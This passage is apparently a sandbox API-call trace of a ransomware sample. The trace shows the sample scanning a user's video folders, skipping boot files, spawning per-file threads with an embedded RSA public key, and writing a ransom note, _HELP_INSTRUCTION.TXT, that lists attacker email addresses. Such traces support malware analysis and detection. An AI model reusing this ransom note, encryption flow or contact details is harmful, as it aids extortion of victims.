lpSrch="NTLDR") returned 0x0 [0131.030] StrStrW (lpFirst="No0nJ8TKbF9hYhiurGN.mp4", lpSrch="NTDETECT.COM") returned 0x0 [0131.030] StrStrW (lpFirst="No0nJ8TKbF9hYhiurGN.mp4", lpSrch="ntdetect.com") returned 0x0 [0131.030] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="Desktop") returned 0x0 [0131.030] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="DESKTOP") returned 0x0 [0131.030] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0131.030] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0131.030] lstrcpyW (in: lpString1=0x17addc, lpString2="No0nJ8TKbF9hYhiurGN.mp4" | out: lpString1="No0nJ8TKbF9hYhiurGN.mp4") returned="No0nJ8TKbF9hYhiurGN.mp4" [0131.030] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0131.030] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x68c [0131.030] Sleep (dwMilliseconds=0x96) [0131.248] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0131.248] lstrcmpW (lpString1="q_QGnOQQGbujC4p8q.swf", lpString2="..") returned 1 [0131.248] lstrcmpW (lpString1="q_QGnOQQGbujC4p8q.swf", lpString2=".") returned 1 [0131.248] StrStrW (lpFirst="q_QGnOQQGbujC4p8q.swf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0131.248] StrStrW (lpFirst="q_QGnOQQGbujC4p8q.swf", lpSrch="ntldr") returned 0x0 [0131.248] StrStrW (lpFirst="q_QGnOQQGbujC4p8q.swf", lpSrch="NTLDR") returned 0x0 [0131.248] StrStrW (lpFirst="q_QGnOQQGbujC4p8q.swf", lpSrch="NTDETECT.COM") returned 0x0 [0131.248] StrStrW (lpFirst="q_QGnOQQGbujC4p8q.swf", lpSrch="ntdetect.com") returned 0x0 [0131.248] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="Desktop") returned 0x0 [0131.248] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="DESKTOP") returned 0x0 [0131.248] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0131.248] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0131.248] lstrcpyW (in: lpString1=0x17addc, lpString2="q_QGnOQQGbujC4p8q.swf" | out: lpString1="q_QGnOQQGbujC4p8q.swf") returned="q_QGnOQQGbujC4p8q.swf" [0131.248] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0131.248] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x694 [0131.249] WaitForSingleObject (hHandle=0x694, dwMilliseconds=0xffffffff) returned 0x0 [0131.468] Sleep (dwMilliseconds=0x96) [0131.622] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0131.622] lstrcmpW (lpString1="wMr3QKnu.mp4", lpString2="..") returned 1 [0131.623] lstrcmpW (lpString1="wMr3QKnu.mp4", lpString2=".") returned 1 [0131.623] StrStrW (lpFirst="wMr3QKnu.mp4", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0131.623] StrStrW (lpFirst="wMr3QKnu.mp4", lpSrch="ntldr") returned 0x0 [0131.623] StrStrW (lpFirst="wMr3QKnu.mp4", lpSrch="NTLDR") returned 0x0 [0131.623] StrStrW (lpFirst="wMr3QKnu.mp4", lpSrch="NTDETECT.COM") returned 0x0 [0131.623] StrStrW (lpFirst="wMr3QKnu.mp4", lpSrch="ntdetect.com") returned 0x0 [0131.623] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="Desktop") returned 0x0 [0131.623] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="DESKTOP") returned 0x0 [0131.623] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned 80 [0131.623] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0131.623] lstrcpyW (in: lpString1=0x17addc, lpString2="wMr3QKnu.mp4" | out: lpString1="wMr3QKnu.mp4") returned="wMr3QKnu.mp4" [0131.623] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0131.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6a8 [0131.623] Sleep (dwMilliseconds=0x96) [0131.800] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0131.800] FindClose (in: hFindFile=0x3cde658 | out: hFindFile=0x3cde658) returned 1 [0131.800] FindClose (in: hFindFile=0x3cde658 | out: hFindFile=0x3cde658) returned 0 [0131.800] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o" [0131.800] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*" [0131.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="Desktop") returned 0x0 [0131.800] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\", lpSrch="DESKTOP") returned 0x0 [0131.800] SetErrorMode (uMode=0x1) returned 0x1 [0131.800] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\_HELP_INSTRUCTION.TXT") returned 97 [0131.800] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0131.800] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0131.800] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x69c) returned 0x0 [0131.800] RegQueryValueExW (in: hKey=0x69c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cea860, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x3cea860*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0131.800] RegCloseKey (hKey=0x69c) returned 0x0 [0131.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0131.801] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0131.801] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0131.801] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x698 [0131.804] WriteFile (in: hFile=0x698, lpBuffer=0x17839c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x178394, lpOverlapped=0x0 | out: lpBuffer=0x17839c*, lpNumberOfBytesWritten=0x178394*=0x2c4, lpOverlapped=0x0) returned 1 [0131.805] CloseHandle (hObject=0x698) returned 1 [0131.805] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cde658 [0131.805] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o") returned="2SS69ds5b7DlSJShTY0o" [0131.805] lstrcpyW (in: lpString1=0x17a5a4, lpString2="2SS69ds5b7DlSJShTY0o" | out: lpString1="2SS69ds5b7DlSJShTY0o") returned="2SS69ds5b7DlSJShTY0o" [0131.805] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0131.805] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0131.805] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0131.805] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0131.805] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0131.805] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0131.805] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0131.805] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0131.805] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0131.805] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0131.805] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0131.805] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0131.805] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0131.805] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0131.805] FindClose (in: hFindFile=0x3cde658 | out: hFindFile=0x3cde658) returned 1 [0131.805] FindClose (in: hFindFile=0x3cde658 | out: hFindFile=0x3cde658) returned 0 [0131.806] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0131.806] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0131.806] lstrcmpW (lpString1="O903hcW", lpString2="..") returned 1 [0131.806] lstrcmpW (lpString1="O903hcW", lpString2=".") returned 1 [0131.806] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" [0131.806] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0131.806] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpString2="O903hcW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW" [0131.806] SetErrorMode (uMode=0x1) returned 0x1 [0131.806] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW" [0131.806] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0131.806] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0131.806] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*" [0131.806] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cde658 [0131.806] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW") returned="O903hcW" [0131.806] lstrcpyW (in: lpString1=0x17a5a4, lpString2="O903hcW" | out: lpString1="O903hcW") returned="O903hcW" [0131.806] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0131.806] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0131.806] lstrcmpW (lpString1="5Cc08SMWT PKYNwSj.swf", lpString2="..") returned 1 [0131.806] lstrcmpW (lpString1="5Cc08SMWT PKYNwSj.swf", lpString2=".") returned 1 [0131.806] StrStrW (lpFirst="5Cc08SMWT PKYNwSj.swf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0131.806] StrStrW (lpFirst="5Cc08SMWT PKYNwSj.swf", lpSrch="ntldr") returned 0x0 [0131.806] StrStrW (lpFirst="5Cc08SMWT PKYNwSj.swf", lpSrch="NTLDR") returned 0x0 [0131.806] StrStrW (lpFirst="5Cc08SMWT PKYNwSj.swf", lpSrch="NTDETECT.COM") returned 0x0 [0131.806] StrStrW (lpFirst="5Cc08SMWT PKYNwSj.swf", lpSrch="ntdetect.com") returned 0x0 [0131.806] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpSrch="Desktop") returned 0x0 [0131.806] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpSrch="DESKTOP") returned 0x0 [0131.806] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned 67 [0131.806] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0131.806] lstrcpyW (in: lpString1=0x17addc, lpString2="5Cc08SMWT PKYNwSj.swf" | out: lpString1="5Cc08SMWT PKYNwSj.swf") returned="5Cc08SMWT PKYNwSj.swf" [0131.806] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0131.806] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6a4 [0131.807] Sleep (dwMilliseconds=0x96) [0131.950] FindNextFileW (in: hFindFile=0x3cde658, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0131.950] lstrcmpW (lpString1="i2GwNYb4B.mp4", lpString2="..") returned 1 [0131.950] lstrcmpW (lpString1="i2GwNYb4B.mp4", lpString2=".") returned 1 [0131.950] StrStrW (lpFirst="i2GwNYb4B.mp4", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0131.950] StrStrW (lpFirst="i2GwNYb4B.mp4", lpSrch="ntldr") returned 0x0 [0131.950] StrStrW (lpFirst="i2GwNYb4B.mp4", lpSrch="NTLDR") returned 0x0 [0131.950] StrStrW (lpFirst="i2GwNYb4B.mp4", lpSrch="NTDETECT.COM") returned 0x0 [0131.950] StrStrW (lpFirst="i2GwNYb4B.mp4", lpSrch="ntdetect.com") returned 0x0 [0131.950] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpSrch="Desktop") returned 0x0 [0131.950] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 